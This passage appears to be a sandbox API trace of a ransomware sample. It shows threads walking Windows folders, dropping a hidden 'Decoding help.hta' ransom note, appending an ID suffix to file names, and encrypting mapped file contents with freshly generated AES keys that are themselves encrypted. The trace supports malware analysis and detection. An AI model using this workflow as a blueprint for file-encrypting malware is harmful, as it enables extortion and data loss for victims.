lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0058.382] CreateFileMappingA (hFile=0x484, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3e0 [0058.382] CryptAcquireContextA (in: phProv=0x1e99fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1e99fcec*=0x2aac5b38) returned 1 [0060.208] CryptGenKey (in: hProv=0x2aac5b38, Algid=0x6610, dwFlags=0x1, phKey=0x1e99fce8 | out: phKey=0x1e99fce8*=0x671170) returned 1 [0060.208] CryptExportKey (in: hKey=0x671170, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1e99fbe4, pdwDataLen=0x1e99fce4 | out: pbData=0x1e99fbe4*, pdwDataLen=0x1e99fce4*=0x2c) returned 1 [0060.208] MapViewOfFile (hFileMappingObject=0x3e0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x141e0000 [0065.108] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e99fbe4*, pdwDataLen=0x1e99fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1e99fbe4*, pdwDataLen=0x1e99fcf8*=0x100) returned 1 [0065.109] CryptEncrypt (hKey=0x671170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x141e0000, pdwDataLen=0x1e99fce4*=0x100000, dwBufLen=0x100000) Thread: id = 729 os_tid = 0xfac [0054.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*", lpFindFileData=0xc30fd30 | out: lpFindFileData=0xc30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671bf0 [0056.119] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.119] FindNextFileW (in: hFindFile=0x671bf0, lpFindFileData=0xc30fd30 | out: lpFindFileData=0xc30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.119] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.119] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.119] FindNextFileW (in: hFindFile=0x671bf0, lpFindFileData=0xc30fd30 | out: lpFindFileData=0xc30fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1574f00, ftCreationTime.dwHighDateTime=0x1be23e3, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1574f00, ftLastWriteTime.dwHighDateTime=0x1be23e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="FM20.CHM", cAlternateFileName="")) returned 1 [0056.120] lstrcpyW (in: lpString1=0x11334308, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*" [0056.120] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*") returned 68 [0056.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\Decoding help.hta" [0056.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\decoding help.hta")) returned 0xffffffff [0056.120] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x940 [0057.408] WriteFile (in: hFile=0x940, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xc30fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xc30fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.409] CloseHandle (hObject=0x940) returned 1 [0057.409] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.410] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FM20.CHM") returned -1 [0057.410] lstrlenW (lpString="FM20.CHM") returned 8 [0057.410] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*" [0057.410] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*") returned 68 [0057.410] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\", lpString2="FM20.CHM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" [0057.410] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" [0057.410] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.[ID]g9uZrLhJaygpwRm1[ID]" [0057.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.411] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x940 [0057.411] CreateFileMappingA (hFile=0x940, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x944 [0057.411] CryptAcquireContextA (in: phProv=0xc30fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xc30fcec*=0x3449600) returned 1 [0060.134] CryptGenKey (in: hProv=0x3449600, Algid=0x6610, dwFlags=0x1, phKey=0xc30fce8 | out: phKey=0xc30fce8*=0x5db378) returned 1 [0060.134] CryptExportKey (in: hKey=0x5db378, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xc30fbe4, pdwDataLen=0xc30fce4 | out: pbData=0xc30fbe4*, pdwDataLen=0xc30fce4*=0x2c) returned 1 [0060.134] MapViewOfFile (hFileMappingObject=0x944, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x51a40) returned 0x46e0000 [0062.713] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc30fbe4*, pdwDataLen=0xc30fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xc30fbe4*, pdwDataLen=0xc30fcf8*=0x100) returned 1 [0062.719] CryptEncrypt (hKey=0x5db378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x46e0000, pdwDataLen=0xc30fce4*=0x51a40, dwBufLen=0x51a40) Thread: id = 730 os_tid = 0xfb0 [0054.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*", lpFindFileData=0xc51fd30 | out: lpFindFileData=0xc51fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8810 [0057.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.531] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0xc51fd30 | out: lpFindFileData=0xc51fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.531] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0057.531] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.531] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0xc51fd30 | out: lpFindFileData=0xc51fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0057.531] lstrcmpW (lpString1=".", lpString2="Windows") returned -1 [0057.531] lstrcmpW (lpString1="..", lpString2="Windows") returned -1 [0057.531] lstrcmpiW (lpString1="windows", lpString2="Windows") returned 0 [0057.531] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0xc51fd30 | out: lpFindFileData=0xc51fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0057.531] FindClose (in: hFindFile=0x5d8810 | out: hFindFile=0x5d8810) returned 1 Thread: id = 731 os_tid = 0xfb4 [0054.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*", lpFindFileData=0x1275fd30 | out: lpFindFileData=0x1275fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db8b8 [0056.861] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.861] FindNextFileW (in: hFindFile=0x5db8b8, lpFindFileData=0x1275fd30 | out: lpFindFileData=0x1275fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.862] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.862] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.862] FindNextFileW (in: hFindFile=0x5db8b8, lpFindFileData=0x1275fd30 | out: lpFindFileData=0x1275fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0056.862] FindClose (in: hFindFile=0x5db8b8 | out: hFindFile=0x5db8b8) returned 1 Thread: id = 732 os_tid = 0xfb8 [0054.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0xa9cfd30 | out: lpFindFileData=0xa9cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671970 [0056.116] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.117] FindNextFileW (in: hFindFile=0x671970, lpFindFileData=0xa9cfd30 | out: lpFindFileData=0xa9cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.117] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.117] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.117] FindNextFileW (in: hFindFile=0x671970, lpFindFileData=0xa9cfd30 | out: lpFindFileData=0xa9cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x884c0c00, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x884c0c00, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x884c0c00, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0056.117] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*" [0056.117] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*") returned 120 [0056.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" [0056.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\decoding help.hta")) returned 0xffffffff [0056.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 733 os_tid = 0xfbc [0054.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0xb78fd30 | out: lpFindFileData=0xb78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671ef0 [0054.484] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.484] FindNextFileW (in: hFindFile=0x671ef0, lpFindFileData=0xb78fd30 | out: lpFindFileData=0xb78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.484] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.484] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.484] FindNextFileW (in: hFindFile=0x671ef0, lpFindFileData=0xb78fd30 | out: lpFindFileData=0xb78fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x969a2800, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x969a2800, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x969a2800, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc5b25, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0054.484] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" [0054.484] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 122 [0054.484] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" [0054.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\decoding help.hta")) returned 0xffffffff [0054.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0056.122] WriteFile (in: hFile=0x1b4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb78fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb78fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.474] CloseHandle (hObject=0x1b4) returned 1 [0057.474] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.474] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0057.474] lstrlenW (lpString="cab1.cab") returned 8 [0057.474] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" [0057.474] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 122 [0057.474] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0057.474] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0057.474] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package 